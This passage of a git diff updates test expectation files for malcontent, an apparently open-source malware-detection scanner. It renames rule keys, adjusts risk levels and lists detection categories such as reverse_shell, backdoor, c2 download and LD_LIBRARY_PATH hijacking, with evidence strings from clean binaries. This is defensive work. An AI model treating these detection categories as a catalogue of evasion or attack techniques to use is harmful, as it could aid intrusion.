[if_nametoindex](https://github.com/search?q=if_nametoindex&type=code) | | LOW | [discover/process/parent](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/parent.yara#getppid) | gets parent process ID | [getppid](https://github.com/search?q=getppid&type=code) | -| LOW | [discover/system/hostname_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname-get.yara#gethostname) | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [gethostname](https://github.com/search?q=gethostname&type=code) | +| LOW | [discover/system/hostname](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname.yara#gethostname) | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [gethostname](https://github.com/search?q=gethostname&type=code) | | LOW | [discover/user/HOME](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/HOME.yara#HOME) | [Looks up the HOME directory for the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [HOME](https://github.com/search?q=HOME&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | | LOW | [discover/user/USER](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/USER.yara#USER) | [Looks up the USER name of the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [USER](https://github.com/search?q=USER&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | | LOW | [evasion/hijack_execution/LD_LIBRARY_PATH](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/hijack_execution/LD_LIBRARY_PATH.yara#ld_library_path) | ld library path | [LD_LIBRARY_PATH](https://github.com/search?q=LD_LIBRARY_PATH&type=code) | @@ -114,7 +115,6 @@ | LOW | [exec/dylib/iterate](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/dylib/iterate.yara#dl_iterate_phdr) | [iterate over list of shared objects](https://man7.org/linux/man-pages/man3/dl_iterate_phdr.3.html) | [dl_iterate_phdr](https://github.com/search?q=dl_iterate_phdr&type=code) | | LOW | [exec/plugin](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/plugin/plugin.yara#plugin) | references a 'plugin' | [Chromium PDF Plugin](https://github.com/search?q=Chromium+PDF+Plugin&type=code)
[ContainsPlugins](https://github.com/search?q=ContainsPlugins&type=code)
[Failed to generate a plugin id](https://github.com/search?q=Failed+to+generate+a+plugin+id&type=code)
[GetPluginInfo](https://github.com/search?q=GetPluginInfo&type=code)
[GetPlugins](https://github.com/search?q=GetPlugins&type=code)
[If you want to block plugins](https://github.com/search?q=If+you+want+to+block+plugins&type=code)
[Is an accelerated plugin](https://github.com/search?q=Is+an+accelerated+plugin&type=code)
[LoadPluginsSoon](https://github.com/search?q=LoadPluginsSoon&type=code)
[No PPP_GetInterface in plugin library](https://github.com/search?q=No+PPP_GetInterface+in+plugin+library&type=code)
[No PPP_InitializeModule in plugin library](https://github.com/search?q=No+PPP_InitializeModule+in+plugin+library&type=code)
[OnPepperPluginCrashed](https://github.com/search?q=OnPepperPluginCrashed&type=code)
[OnPepperPluginHung](https://github.com/search?q=OnPepperPluginHung&type=code)
[OpenChannelToPepperPlugin](https://github.com/search?q=OpenChannelToPepperPlugin&type=code)
[Pepper Plugin Broker](https://github.com/search?q=Pepper+Plugin+Broker&type=code)
[PepperPluginInstance](https://github.com/search?q=PepperPluginInstance&type=code)
[Plugin Changed](https://github.com/search?q=Plugin+Changed&type=code)
[Plugin URL](https://github.com/search?q=Plugin+URL&type=code)
[Plugin doesn](https://github.com/search?q=Plugin+doesn&type=code)
[PluginArray](https://github.com/search?q=PluginArray&type=code)
[PluginContextSecurity](https://github.com/search?q=PluginContextSecurity&type=code)
[PluginData](https://github.com/search?q=PluginData&type=code)
[PluginDispatcher](https://github.com/search?q=PluginDispatcher&type=code)
[PluginLoad](https://github.com/search?q=PluginLoad&type=code)
[PluginPrivate](https://github.com/search?q=PluginPrivate&type=code)
[PluginRegistry](https://github.com/search?q=PluginRegistry&type=code)
[PluginResource](https://github.com/search?q=PluginResource&type=code)
[PluginService](https://github.com/search?q=PluginService&type=code)
[PluginSizeUpdated](https://github.com/search?q=PluginSizeUpdated&type=code)
[PpapiMsg_LoadPlugin](https://github.com/search?q=PpapiMsg_LoadPlugin&type=code)
[PpapiPluginMain](https://github.com/search?q=PpapiPluginMain&type=code)
[PpapiPluginMetrics](https://github.com/search?q=PpapiPluginMetrics&type=code)
[RemoveBrowserPluginEmbedder](https://github.com/search?q=RemoveBrowserPluginEmbedder&type=code)
[SendToPlugin](https://github.com/search?q=SendToPlugin&type=code)
[SetBrowserPluginGuest](https://github.com/search?q=SetBrowserPluginGuest&type=code)
[The plugin has not](https://github.com/search?q=The+plugin+has+not&type=code)
[Unable to create ppapi plugin process](https://github.com/search?q=Unable+to+create+ppapi+plugin+process&type=code)
[Unable to load plugin](https://github.com/search?q=Unable+to+load+plugin&type=code)
[Unable to load ppapi plugin](https://github.com/search?q=Unable+to+load+ppapi+plugin&type=code)
[allowNonEmptyNavigatorPlugins](https://github.com/search?q=allowNonEmptyNavigatorPlugins&type=code)
[as a plugin](https://github.com/search?q=as+a+plugin&type=code)
[browserplugin](https://github.com/search?q=browserplugin&type=code)
[enabledPlugin](https://github.com/search?q=enabledPlugin&type=code)
[html_plugin_element](https://github.com/search?q=html_plugin_element&type=code)
[kPluginObject](https://github.com/search?q=kPluginObject&type=code)
[loadplugin](https://github.com/search?q=loadplugin&type=code)
[of theremnants ofpluginspage](https://github.com/search?q=of+theremnants+ofpluginspage&type=code)
[page contains plugins](https://github.com/search?q=page+contains+plugins&type=code)
[pdf_internal_plugin_wrapper](https://github.com/search?q=pdf_internal_plugin_wrapper&type=code)
[pdf_view_plugin_base](https://github.com/search?q=pdf_view_plugin_base&type=code)
[pdf_view_web_plugin](https://github.com/search?q=pdf_view_web_plugin&type=code)
[pepper_hung_plugin_filter](https://github.com/search?q=pepper_hung_plugin_filter&type=code)
[pepper_webplugin_impl](https://github.com/search?q=pepper_webplugin_impl&type=code)
[plugin data](https://github.com/search?q=plugin+data&type=code)
[pluginObject](https://github.com/search?q=pluginObject&type=code)
[plugin_audio_thread](https://github.com/search?q=plugin_audio_thread&type=code)
[plugin_container_impl](https://github.com/search?q=plugin_container_impl&type=code)
[plugin_instance_impl](https://github.com/search?q=plugin_instance_impl&type=code)
[plugin_message_filter](https://github.com/search?q=plugin_message_filter&type=code)
[plugin_module](https://github.com/search?q=plugin_module&type=code)
[plugin_private_storage](https://github.com/search?q=plugin_private_storage&type=code)
[plugin_process_host](https://github.com/search?q=plugin_process_host&type=code)
[plugin_service_impl](https://github.com/search?q=plugin_service_impl&type=code)
[pluginprH](https://github.com/search?q=pluginprH&type=code)
[pluginsEnabled](https://github.com/search?q=pluginsEnabled&type=code)
[pluginspace](https://github.com/search?q=pluginspace&type=code)
[pluginswithin](https://github.com/search?q=pluginswithin&type=code)
[pluginurl](https://github.com/search?q=pluginurl&type=code)
[ppapi_plugin_main](https://github.com/search?q=ppapi_plugin_main&type=code)
[ppapi_plugin_process](https://github.com/search?q=ppapi_plugin_process&type=code)
[r PluginH](https://github.com/search?q=r+PluginH&type=code)
[relativebringingincreasegovernorplugins](https://github.com/search?q=relativebringingincreasegovernorplugins&type=code)
[security origin than your plugin](https://github.com/search?q=security+origin+than+your+plugin&type=code)
[strictMixedContentCheckingForPlugin](https://github.com/search?q=strictMixedContentCheckingForPlugin&type=code)
[suggestplugin](https://github.com/search?q=suggestplugin&type=code) | | LOW | [exec/program/background](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/program-background.yara#waitpid) | [wait for process to exit](https://linux.die.net/man/2/waitpid) | [waitpid](https://github.com/search?q=waitpid&type=code) | -| LOW | [exec/program/hidden](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/hidden.yara#relative_hidden_launcher) | relative hidden launcher | [./.691.9B](https://github.com/search?q=.%2F.691.9B&type=code)
[bash](https://github.com/search?q=bash&type=code)
[exec](https://github.com/search?q=exec&type=code)
[system](https://github.com/search?q=system&type=code) | | LOW | [exec/shell/TERM](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/TERM.yara#TERM) | [Look up or override terminal settings](https://www.gnu.org/software/gettext/manual/html_node/The-TERM-variable.html) | [TERM](https://github.com/search?q=TERM&type=code) | | LOW | [fs/directory/create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory/directory-create.yara#mkdir) | [creates directories](https://man7.org/linux/man-pages/man2/mkdir.2.html) | [CreateDirectoryAndGetEr](https://github.com/search?q=CreateDirectoryAndGetEr&type=code)
[CreateDirectoryResult](https://github.com/search?q=CreateDirectoryResult&type=code)
[createFolder](https://github.com/search?q=createFolder&type=code)
[mkdir](https://github.com/search?q=mkdir&type=code) |
 | LOW | [fs/directory/remove](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory/directory-remove.yara#rmdir) | Uses libc functions to remove directories | [rmdir](https://github.com/search?q=rmdir&type=code) |
diff --git a/tests/linux/clean/containerd.simple b/tests/linux/clean/containerd.simple
index 216e3c50b..74979278e 100644
--- a/tests/linux/clean/containerd.simple
+++ b/tests/linux/clean/containerd.simple
@@ -23,8 +23,8 @@ data/encoding/json: low
 data/encoding/json_decode: low
 data/hash/md5: low
 discover/network/mac_address: medium
-discover/system/cpu_info: low
-discover/system/hostname_get: low
+discover/system/cpu: low
+discover/system/hostname: low
 discover/system/platform: medium
 discover/user/USER: low
 evasion/file/location/dev_mqueue: medium
@@ -94,7 +94,6 @@ net/ip/icmp: medium
 net/ip/multicast_send: low
 net/ip/parse: medium
 net/ip/send_unicast: low
-net/ip/spoof: medium
 net/resolve/hostname: low
 net/socket/listen: medium
 net/socket/local_addr: low
diff --git a/tests/linux/clean/cpack.md b/tests/linux/clean/cpack.md
index 353ca110a..ca1168f2f 100644
--- a/tests/linux/clean/cpack.md
+++ b/tests/linux/clean/cpack.md
@@ -2,7 +2,7 @@ | RISK | KEY | DESCRIPTION | EVIDENCE | |--------|------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|--------------------------------------------------------------------------------------------------------------------------------|----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| -| HIGH | [c2/addr/url](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/url.yara#binary_php_url_with_question) | contains hardcoded endpoint with a question mark | 
[https://jrsoftware.org/isinfo.php?](https://jrsoftware.org/isinfo.php?) | +| HIGH | [c2/addr/url](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/url.yara#binary_url_with_question) | binary contains hardcoded URL with question mark | [https://jrsoftware.org/isinfo.php?](https://jrsoftware.org/isinfo.php?) | | MEDIUM | [c2/addr/ip](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/ip.yara#ip_port_mention) | mentions an IP and port | [IP](https://github.com/search?q=IP&type=code)
[Ip](https://github.com/search?q=Ip&type=code)
[Port](https://github.com/search?q=Port&type=code)
[local_ip](https://github.com/search?q=local_ip&type=code)
[use_port](https://github.com/search?q=use_port&type=code) | | MEDIUM | [crypto/file_encrypter](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/file-encrypter.yara#file_crypter) | Encrypts files | [cryptor](https://github.com/search?q=cryptor&type=code) | | MEDIUM | [data/base64/decode](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/base64/base64-decode.yara#py_base64_decode) | decode base64 strings | [base64_decode](https://github.com/search?q=base64_decode&type=code) | @@ -57,8 +57,8 @@ | LOW | [data/hash/md5](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/hash/md5.yara#MD5) | Uses the MD5 signature format | [MD5_Final](https://github.com/search?q=MD5_Final&type=code)
[MD5_Init](https://github.com/search?q=MD5_Init&type=code)
[MD5_Update](https://github.com/search?q=MD5_Update&type=code) | | LOW | [data/hash/sha256](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/hash/sha256.yara#SHA256) | Uses the SHA256 signature format | [SHA256_](https://github.com/search?q=SHA256_&type=code) | | LOW | [data/random/insecure](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/random/insecure.yara#bsd_rand) | [generate random numbers insecurely](https://man.openbsd.org/rand) | [srand](https://github.com/search?q=srand&type=code) | -| LOW | [discover/network/interface_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/interface-get.yara#bsd_if) | get network interfaces by name or index | [if_nametoindex](https://github.com/search?q=if_nametoindex&type=code) | -| LOW | [discover/system/hostname_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname-get.yara#gethostname) | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [gethostname](https://github.com/search?q=gethostname&type=code) | +| LOW | [discover/network/interface](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/interface.yara#bsd_if) | get network interfaces by name or index | [if_nametoindex](https://github.com/search?q=if_nametoindex&type=code) | +| LOW | [discover/system/hostname](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname.yara#gethostname) | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [gethostname](https://github.com/search?q=gethostname&type=code) | | LOW | [discover/user/HOME](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/HOME.yara#HOME) | [Looks up the HOME directory for the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [HOME](https://github.com/search?q=HOME&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | | LOW | [discover/user/USER](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/USER.yara#USER) | [Looks up the USER name of the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [USER](https://github.com/search?q=USER&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | | LOW | [exec/conditional/LANG](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/conditional/LANG.yara#LANG_getenv) | Looks up language of current user | [LANG](https://github.com/search?q=LANG&type=code)
[getenv](https://github.com/search?q=getenv&type=code) |
diff --git a/tests/linux/clean/default_config.json.simple b/tests/linux/clean/default_config.json.simple
index da8770463..4d372b2a0 100644
--- a/tests/linux/clean/default_config.json.simple
+++ b/tests/linux/clean/default_config.json.simple
@@ -20,7 +20,8 @@ data/compression/bzip2: low
 data/compression/lzma: low
 data/compression/zstd: low
 data/encoding/base64: low
-discover/system/network: medium
+discover/multiple: medium
+discover/system/dmesg: low
 discover/system/platform: low
 discover/user/name_get: medium
 evasion/bypass_security/linux/iptables: medium
diff --git a/tests/linux/clean/kibana/cde1bafa-9f01-4f43-a872-605b678968b0_111.json.simple b/tests/linux/clean/kibana/cde1bafa-9f01-4f43-a872-605b678968b0_111.json.simple
index c1ebf94c1..ee2b6461a 100644
--- a/tests/linux/clean/kibana/cde1bafa-9f01-4f43-a872-605b678968b0_111.json.simple
+++ b/tests/linux/clean/kibana/cde1bafa-9f01-4f43-a872-605b678968b0_111.json.simple
@@ -52,7 +52,7 @@ exec/shell/command: medium
 exec/shell/power: medium
 exfil/collection: medium
 impact/infection/infected: medium
-impact/remote_access/backdoor: high
+impact/remote_access/backdoor: medium
 impact/remote_access/implant: medium
 impact/remote_access/reverse_shell: high
 net/dns/txt: low
diff --git a/tests/linux/clean/kibana/securitySolution.chunk.9.js.simple b/tests/linux/clean/kibana/securitySolution.chunk.9.js.simple
index 89da6b666..cb294eb02 100644
--- a/tests/linux/clean/kibana/securitySolution.chunk.9.js.simple
+++ b/tests/linux/clean/kibana/securitySolution.chunk.9.js.simple
@@ -72,8 +72,7 @@ impact/exploit/known_s: medium
 impact/exploit/overflow_shellcode: high
 impact/infection/infected: medium
 impact/infection/worm: medium
-impact/remote_access/backdoor: high
-impact/remote_access/botnet: medium
+impact/remote_access/backdoor: medium
 impact/remote_access/iptables: medium
 impact/remote_access/reverse_shell: high
 impact/remote_access/trojan: medium
diff --git a/tests/linux/clean/kuma-cp.simple b/tests/linux/clean/kuma-cp.simple
index 6477bb5ab..34eb70185 100644
--- a/tests/linux/clean/kuma-cp.simple
+++ b/tests/linux/clean/kuma-cp.simple
@@ -33,8 +33,9 @@ discover/network/interface_list: medium
 discover/network/mac_address: medium
 discover/network/netstat: medium
 discover/processes/list: medium
-discover/system/cpu_info: low
-discover/system/hostname_get: low
+discover/system/cpu: low
+discover/system/dmesg: low
+discover/system/hostname: low
 discover/system/platform: medium
 discover/user/HOME: low
 discover/user/USER: low
diff --git a/tests/linux/clean/ld-2.27.so.simple b/tests/linux/clean/ld-2.27.so.simple
index b73884649..d35fb32aa 100644
--- a/tests/linux/clean/ld-2.27.so.simple
+++ b/tests/linux/clean/ld-2.27.so.simple
@@ -2,7 +2,7 @@
 anti-behavior/LD_DEBUG: medium
 anti-behavior/LD_PROFILE: medium
 discover/process/runtime_deps: medium
-discover/system/dev_full: medium
+discover/system/dev_full: low
 evasion/hijack_execution/LD_LIBRARY_PATH: low
 evasion/hijack_execution/etc_ld.so.preload: medium
 fs/path/etc: low
diff --git a/tests/linux/clean/libgcj.so.17.0.0.simple b/tests/linux/clean/libgcj.so.17.0.0.simple
index 3a05df73d..b2dee9151 100644
--- a/tests/linux/clean/libgcj.so.17.0.0.simple
+++ b/tests/linux/clean/libgcj.so.17.0.0.simple
@@ -19,8 +19,8 @@ data/hash/sha256: low
 data/hash/whirlpool: medium
 discover/network/interface_list: medium
 discover/process/name: medium
-discover/system/cpu_info: low
-discover/system/hostname_get: low
+discover/system/cpu: low
+discover/system/hostname: low
 discover/system/platform: low
 discover/user/HOME: low
 discover/user/USER: low
diff --git a/tests/linux/clean/libgcj.so.17.simple b/tests/linux/clean/libgcj.so.17.simple
index 592fdca9a..86be6e324 100644
--- a/tests/linux/clean/libgcj.so.17.simple
+++ b/tests/linux/clean/libgcj.so.17.simple
@@ -19,8 +19,8 @@ data/hash/sha256: low
 data/hash/whirlpool: medium
 discover/network/interface_list: medium
 discover/process/name: medium
-discover/system/cpu_info: low
-discover/system/hostname_get: low
+discover/system/cpu: low
+discover/system/hostname: low
 discover/system/platform: low
 discover/user/HOME: low
 discover/user/USER: low
diff --git a/tests/linux/clean/ls.x86_64.md b/tests/linux/clean/ls.x86_64.md
index fe3d4731f..ab48ef8b6 100644
--- a/tests/linux/clean/ls.x86_64.md
+++ b/tests/linux/clean/ls.x86_64.md
@@ -1,11 +1,11 @@ ## linux/clean/ls.x86_64 [🟡 MEDIUM] -| RISK | KEY | DESCRIPTION | EVIDENCE | -|--------|--------------------------------------------------------------------------------------------------------------------------------------------|-----------------------------------------------------------------------------------------------------------------------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| -| MEDIUM | [process/name_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/name-set.yara#__progname) | [get or set the current process name](https://stackoverflow.com/questions/273691/using-progname-instead-of-argv0) | [__progname](https://github.com/search?q=__progname&type=code) | -| LOW | [data/compression/lzma](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/compression/lzma.yara#gzip) | [works with lzma files](https://en.wikipedia.org/wiki/Lempel%E2%80%93Ziv%E2%80%93Markov_chain_algorithm) | [lzma](https://github.com/search?q=lzma&type=code) | -| LOW | [discover/system/hostname_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname-get.yara#gethostname) | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [gethostname](https://github.com/search?q=gethostname&type=code) | -| LOW | [exec/shell/TERM](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/TERM.yara#TERM) | [Look up or override terminal settings](https://www.gnu.org/software/gettext/manual/html_node/The-TERM-variable.html) | [TERM](https://github.com/search?q=TERM&type=code) | -| LOW | 
[fs/link_read](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/link-read.yara#readlink) | [read value of a symbolic link](https://man7.org/linux/man-pages/man2/readlink.2.html) | [readlink](https://github.com/search?q=readlink&type=code) | -| LOW | [net/url/embedded](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/embedded.yara#https_url) | contains embedded HTTPS URLs | [https://gnu.org/licenses/gpl.html](https://gnu.org/licenses/gpl.html)
[https://translationproject.org/team/](https://translationproject.org/team/)
[https://wiki.xiph.org/MIME_Types_and_File_Extensions](https://wiki.xiph.org/MIME_Types_and_File_Extensions)
[https://www.gnu.org/software/coreutils/](https://www.gnu.org/software/coreutils/) | +| RISK | KEY | DESCRIPTION | EVIDENCE | +|--------|------------------------------------------------------------------------------------------------------------------------------------|-----------------------------------------------------------------------------------------------------------------------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| +| MEDIUM | [process/name_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/name-set.yara#__progname) | [get or set the current process name](https://stackoverflow.com/questions/273691/using-progname-instead-of-argv0) | [__progname](https://github.com/search?q=__progname&type=code) | +| LOW | [data/compression/lzma](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/compression/lzma.yara#gzip) | [works with lzma files](https://en.wikipedia.org/wiki/Lempel%E2%80%93Ziv%E2%80%93Markov_chain_algorithm) | [lzma](https://github.com/search?q=lzma&type=code) | +| LOW | [discover/system/hostname](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname.yara#gethostname) | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [gethostname](https://github.com/search?q=gethostname&type=code) | +| LOW | [exec/shell/TERM](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/TERM.yara#TERM) | [Look up or override terminal settings](https://www.gnu.org/software/gettext/manual/html_node/The-TERM-variable.html) | [TERM](https://github.com/search?q=TERM&type=code) | +| LOW | 
[fs/link_read](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/link-read.yara#readlink) | [read value of a symbolic link](https://man7.org/linux/man-pages/man2/readlink.2.html) | [readlink](https://github.com/search?q=readlink&type=code) | +| LOW | [net/url/embedded](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/embedded.yara#https_url) | contains embedded HTTPS URLs | [https://gnu.org/licenses/gpl.html](https://gnu.org/licenses/gpl.html)
[https://translationproject.org/team/](https://translationproject.org/team/)
[https://wiki.xiph.org/MIME_Types_and_File_Extensions](https://wiki.xiph.org/MIME_Types_and_File_Extensions)
[https://www.gnu.org/software/coreutils/](https://www.gnu.org/software/coreutils/) |
diff --git a/tests/linux/clean/melange.simple b/tests/linux/clean/melange.simple
index 4702fc3f4..65688de3f 100644
--- a/tests/linux/clean/melange.simple
+++ b/tests/linux/clean/melange.simple
@@ -36,8 +36,9 @@ discover/network/interface_list: medium
 discover/network/mac_address: medium
 discover/network/netstat: medium
 discover/processes/pgrep: medium
-discover/system/cpu_info: low
-discover/system/hostname_get: low
+discover/system/cpu: low
+discover/system/dmesg: low
+discover/system/hostname: low
 discover/system/platform: medium
 discover/system/sysinfo: medium
 discover/user/HOME: low
diff --git a/tests/linux/clean/misp_sample.ndjson.log.simple b/tests/linux/clean/misp_sample.ndjson.log.simple
index e318a6866..2e8742a3d 100644
--- a/tests/linux/clean/misp_sample.ndjson.log.simple
+++ b/tests/linux/clean/misp_sample.ndjson.log.simple
@@ -1,4 +1,4 @@
-# linux/clean/misp_sample.ndjson.log: critical
+# linux/clean/misp_sample.ndjson.log: high
 3P/threat_hunting/pastebin: medium
 c2/addr/ip: medium
 c2/tool_transfer/download: high
@@ -7,6 +7,6 @@ evasion/rootkit/refs: high
 exec/shell/command: medium
 false-positives/filebeat: low
 impact/ransom/decryptor: medium
-impact/remote_access/backdoor: high
+impact/remote_access/backdoor: medium
 net/url/embedded: medium
 os/fd/multiplex: low
diff --git a/tests/linux/clean/mongosh.simple b/tests/linux/clean/mongosh.simple
index b1601c57a..a2450ed9f 100644
--- a/tests/linux/clean/mongosh.simple
+++ b/tests/linux/clean/mongosh.simple
@@ -36,13 +36,13 @@ data/random/insecure: low
 discover/cloud/aws_metadata: low
 discover/cloud/google_metadata: low
 discover/group/lookup: medium
-discover/network/interface_get: low
+discover/network/interface: low
 discover/network/interface_list: medium
 discover/network/mac_address: medium
 discover/process/name: medium
 discover/process/parent: low
 discover/processes/list: medium
-discover/system/hostname_get: low
+discover/system/hostname: low
 discover/system/platform: medium
 discover/system/sysinfo: medium
 discover/user/HOME: low
diff --git a/tests/linux/clean/opa.simple b/tests/linux/clean/opa.simple
index 360cb7418..255d5ee87 100644
--- a/tests/linux/clean/opa.simple
+++ b/tests/linux/clean/opa.simple
@@ -22,8 +22,8 @@ data/encoding/json_encode: low
 data/hash/md5: low
 discover/cloud/aws_metadata: low
 discover/cloud/google_metadata: low
-discover/system/cpu_info: low
-discover/system/hostname_get: low
+discover/system/cpu: low
+discover/system/hostname: low
 discover/system/platform: medium
 discover/system/sysinfo: medium
 discover/user/USER: low
diff --git a/tests/linux/clean/pandoc.md b/tests/linux/clean/pandoc.md
index cfcfe07e9..27105d8cd 100644
--- a/tests/linux/clean/pandoc.md
+++ b/tests/linux/clean/pandoc.md
@@ -69,7 +69,7 @@
 | MEDIUM | [net/url/encode](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/encode.yara#url_encode) | encodes URL, likely to pass GET variables | [urlencode](https://github.com/search?q=urlencode&type=code) |
 | MEDIUM | [net/webrtc](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/webrtc.yara#webrtc_peer) | makes outgoing WebRTC connections | [RTCPeerConnection](https://github.com/search?q=RTCPeerConnection&type=code) |
 | MEDIUM | [os/kernel/opencl](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/kernel/opencl.yara#OpenCL) | support for OpenCL | [OpenCL](https://github.com/search?q=OpenCL&type=code) |
-| MEDIUM | [persist/cron/tab](https://github.com/chainguard-dev/malcontent/blob/main/rules/persist/cron/crontab.yara#crontab_support) | supports crontab manipulation | [crontab](https://github.com/search?q=crontab&type=code) |
+| MEDIUM | [persist/cron/tab](https://github.com/chainguard-dev/malcontent/blob/main/rules/persist/cron/tab.yara#crontab_support) | supports crontab manipulation | [crontab](https://github.com/search?q=crontab&type=code) |
 | MEDIUM | [persist/kernel_module/module](https://github.com/chainguard-dev/malcontent/blob/main/rules/persist/kernel_module/module.yara#delete_module) | Unload Linux kernel module | [delete_module](https://github.com/search?q=delete_module&type=code) |
 | MEDIUM | [persist/pid_file](https://github.com/chainguard-dev/malcontent/blob/main/rules/persist/pid_file.yara#pid_file) | pid file, likely DIY daemon | [PidFile](https://github.com/search?q=PidFile&type=code) |
 | MEDIUM | [privesc/sudo](https://github.com/chainguard-dev/malcontent/blob/main/rules/privesc/sudo.yara#sudo) | calls sudo | [sudo](https://github.com/search?q=sudo&type=code) |
@@ -90,8 +90,9 @@ | LOW | [data/hash/sha256](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/hash/sha256.yara#SHA256) | Uses the SHA256 signature format | [SHA256_](https://github.com/search?q=SHA256_&type=code) | | LOW | [data/random/insecure](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/random/insecure.yara#bsd_rand) | [generate random numbers insecurely](https://man.openbsd.org/rand) | [_rand](https://github.com/search?q=_rand&type=code)
[srand](https://github.com/search?q=srand&type=code) | | LOW | [discover/process/parent](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/parent.yara#getppid) | gets parent process ID | [getppid](https://github.com/search?q=getppid&type=code) | -| LOW | [discover/system/cpu_info](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/cpu-info.yara#processor_count) | [gets number of processors](https://man7.org/linux/man-pages/man3/get_nprocs.3.html) | [nproc](https://github.com/search?q=nproc&type=code) | -| LOW | [discover/system/hostname_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname-get.yara#gethostname) | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [gethostname](https://github.com/search?q=gethostname&type=code) | +| LOW | [discover/system/cpu](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/cpu.yara#processor_count) | [gets number of processors](https://man7.org/linux/man-pages/man3/get_nprocs.3.html) | [nproc](https://github.com/search?q=nproc&type=code) | +| LOW | [discover/system/dmesg](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/dmesg.yara#dmesg) | accesses the kernel log ring buffer | [dmesg](https://github.com/search?q=dmesg&type=code) | +| LOW | [discover/system/hostname](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname.yara#gethostname) | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [gethostname](https://github.com/search?q=gethostname&type=code) | | LOW | [discover/system/machine_id](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/machine_id.yara#machineid) | Gets a unique machineid for the host | [machineid](https://github.com/search?q=machineid&type=code) | | LOW | 
